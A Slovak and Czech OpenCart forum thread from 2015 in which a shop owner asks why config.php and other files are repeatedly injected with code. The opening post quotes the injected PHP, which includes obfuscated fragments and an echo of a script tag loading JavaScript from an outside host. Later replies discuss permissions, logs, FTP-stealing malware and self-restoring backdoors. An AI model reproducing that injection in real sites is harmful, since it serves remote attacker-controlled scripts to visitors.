Post by MisoM » Wed Jun 03, 2015 2:40 am

Viete mi niekto poradit co je zle, jeden eshop co som rozbehal na opencart systeme napada stale robot, v config.php a aj inych suboroch z vecera do rana najdem kod:

$ GLOBALS
['_1078704644_']=Array(); ?><
? function _681861654($i){$a=Array();return base64_decode($a[$i]);} ?>if(empty($jrnp)) {$jrnp = "<script type=\"text/javascript\" src=\"http://AZHINEHPS.COM/wp-content/themes/rttheme16/a9k9hbqc.php?id=573629\"></script>";echo $jrnp;}

Vcera som spravil upgrade na poslednu verziu a rano skusam a vidim ze eshop zase nesiel, dnes som nasiel povkladany tento kod zase ...

Vie niekto dat tip co je zle preco sa tam dostane ten robot ...?

Velka vada za pomoc

Newbie

Posts

Joined
Sun Apr 11, 2010 10:26 pm
Location - Slovakia

Post by CZechBoY » Wed Jun 03, 2015 4:46 am

Zdravím,
může byt chyba v zabezpečení hostingu.
Zkuste dát přístupová práva na config.php a index.php pouze pro čtení.

Taky se zkuste zeptat na podpoře hostingu jestli nezaznamenavaji nějaké útoky na dalších webech...
Nebo si zkuste ještě kdyztak nechat zaslat acceess.log (log přístupů) na vas web a zjistit jak se tam útočník dostal.

Mass update product descriptions/Hromadná změna popisků zboží


User avatar
Active Member

Posts

Joined
Mon Mar 19, 2012 1:39 am
Location - Europe, Czech republic; Hradec Králové, Brno

Post by MisoM » Wed Jun 03, 2015 12:59 pm

Noo skusim napisat este na hosting, pristupove prava na read som nastavil uz aj davno aj na cofig.php a aj na prevazne vestky php subory open cart systemu. To este ked eshop bezal na starom syste,e 1.4.7, behom par hodin to bolo zase vsetko napadnute a povkladany ten kod co som pridal, alebo nejaky podobny.

Teraz som spravil update na najskor 2.0.2 co drzalo celkom dobre (asi az tyzden), potom prisla notifikacia ze je dostuna verzia 2.0.3.1, ako som spravil update tak zrazu som vecer zbadal ten kod vlozeny v config.php a do rana cely cast katalogu, alebo teda open cart eshop cast na strane zakaznika lahla, administracia isla dalej...

Newbie

Posts

Joined
Sun Apr 11, 2010 10:26 pm
Location - Slovakia

Post by CZechBoY » Wed Jun 03, 2015 5:24 pm

Složka install je smazaná?
Upload souborů máte povolený?

Mass update product descriptions/Hromadná změna popisků zboží


User avatar
Active Member

Posts

Joined
Mon Mar 19, 2012 1:39 am
Location - Europe, Czech republic; Hradec Králové, Brno

Post by MisoM » Wed Jun 03, 2015 5:57 pm

ano, zlozka install je zmazana a upload suborov je povoleny (ak teda je ymsleny upload na server cez ftp, alebo ja neviem veci cez admina eshopu)

Newbie

Posts

Joined
Sun Apr 11, 2010 10:26 pm
Location - Slovakia

Post by hawkey » Wed Jun 03, 2015 6:46 pm

A nemáte zavirovaný ten počítač ze kterého se tam připojujete přes FTP?

Visit OpencartEx - Opencart extensions
Opencart rady a návody česky | Podpora Opencart


Active Member

Posts

Joined
Sun Apr 25, 2010 12:10 am
Location - Olomouc, Czech Republic, Europe

Post by MisoM » Wed Jun 03, 2015 6:52 pm

nie pocitac je cisty, ono to zacalo po asi 2-3 rokoch behu stranky, znicoho nic web padol s tym ze boli povkladane tie kody

par krat som tam len nahral povodnu verziu, pomenil prava len na read na php subory a niekedy za cas bol pokoj neskor uz na druhy den bolo napadnuter vsetko zase.

web je na hostingu providera, to len teraz ako to zacalo blbnit tak riesim ako to zastavit

Newbie

Posts

Joined
Sun Apr 11, 2010 10:26 pm
Location - Slovakia

Post by hawkey » Thu Jun 04, 2015 4:26 am

Tak pak nevím, ale přesně takto se projevují nějkteré malware v počítači. Samo se to připojí na nastavené účty přes ftp a napadne soubory jako index.php a config.php

Visit OpencartEx - Opencart extensions
Opencart rady a návody česky | Podpora Opencart


Active Member

Posts

Joined
Sun Apr 25, 2010 12:10 am
Location - Olomouc, Czech Republic, Europe

Post by MisoM » Thu Jun 04, 2015 12:58 pm

Este ma napadlo ze ale keby to bol nejaky malware v pocitaci tak by to muselo napadnut tych webov viac, kedze ftp uctov tam mam viac a cely cas to robi len tento jeden web co riesim. Ak by to ale bolo tak ako pises tak teoreticky by to mohol sposobit aj niekto iny kto ma na ftp pristup, kedze pristup tam nemam len ja...

Newbie

Posts

Joined
Sun Apr 11, 2010 10:26 pm
Location - Slovakia

Post by hawkey » Thu Jun 04, 2015 5:11 pm

Ano, to by vysvětlovalo, stává se mi to často že klienti mají malware a já to pak čistím.

Visit OpencartEx - Opencart extensions
Opencart rady a návody česky | Podpora Opencart


Active Member

Posts

Joined
Sun Apr 25, 2010 12:10 am
Location - Olomouc, Czech Republic, Europe

Post by frymi » Fri Jul 10, 2015 3:59 pm

Podobný problém jsem řešit na jednom webu. Na webu byly v ruznych složkach zanořene backdoors skripty, ktere automaticky po nejake dobe nahraly smazane soubory zpet. Soubory se tvářili jako by tam patřili (dle názvu), ale musel jsem komplet smazat web a nahrat ze zalohy, protoze hledat jednotlive soubory slo pouze pres porovnavani obsahu, coz bylo casove narocne. Databazi to neovlivnilo.

Najit napadene soubory bylo mozno pouze pres LOG v php. Zaroven jsem pro jistotu zmenil prihlasovaci udaje i zamknul upload.... coz vsak nepomuze pokud je na webu php skripty, ktery umozni upload pres webove rozhranni.

User avatar
New member

Posts

Joined
Thu Jun 02, 2011 10:47 pm
Location - Olomouc, Czech Republic

Post by jakuba » Wed Aug 19, 2015 8:14 pm

Už asi 5x jsem odvirovával 1.5.6.4 vždy se dostane zpět.

do system logs se nahraje php soubor, adresa chybového souboru je přepsána na .php soubor - tím se asi spouští

po vyčištění, změně hesel ftp mysql a ujištění se, že nebude nikde uloženo opět napadeno.

Soubory odesílají email spam a nesou název wp-info jakoby se mělo jednat o wordpress.

Ví někdo více informací? Má 1564 díru v bezpečnosti?

Active Member

Posts

Joined
Fri Jul 08, 2011 12:51 am
Location - CZ-Prague
Who is online

Users browsing this forum: No registered users and 2 guests